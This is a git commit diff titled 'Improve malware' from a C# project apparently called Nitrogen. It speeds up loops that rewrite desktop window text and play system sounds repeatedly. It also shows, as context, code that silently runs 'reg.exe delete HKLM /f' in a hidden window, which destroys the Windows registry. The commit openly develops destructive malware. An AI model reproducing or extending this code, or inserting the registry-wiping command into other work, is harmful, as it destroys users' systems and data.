Improve malware

This commit is contained in:
Vichingo455 2024-12-22 15:07:46 +01:00
parent 9d3b0d12de
commit 860d5e00d7
1 changed files with 11 additions and 7 deletions

View File

@ -78,13 +78,13 @@ namespace Nitrogen
while (variables.textchanger == true) while (variables.textchanger == true)
{ {
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero); EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
if (variables.extreme == false) if (!variables.extreme)
{ {
Thread.Sleep(1000); Thread.Sleep(1000);
} }
else else
{ {
Thread.Sleep(100); Thread.Sleep(10);
} }
} }
} }
@ -459,6 +459,10 @@ namespace Nitrogen
{ {
PlaySystemSound("SystemNotification"); PlaySystemSound("SystemNotification");
} }
if (variables.extreme)
Thread.Sleep(1);
else
Thread.Sleep(500);
} }
} }
} }
@ -466,11 +470,11 @@ namespace Nitrogen
{ {
ProcessStartInfo registry = new ProcessStartInfo ProcessStartInfo registry = new ProcessStartInfo
{ {
UseShellExecute = true, UseShellExecute = true,
FileName = "reg.exe", FileName = "reg.exe",
Arguments = @"delete HKLM /f", Arguments = @"delete HKLM /f",
CreateNoWindow = true, CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden WindowStyle = ProcessWindowStyle.Hidden
}; };
Process.Start(registry).WaitForExit(); Process.Start(registry).WaitForExit();
} }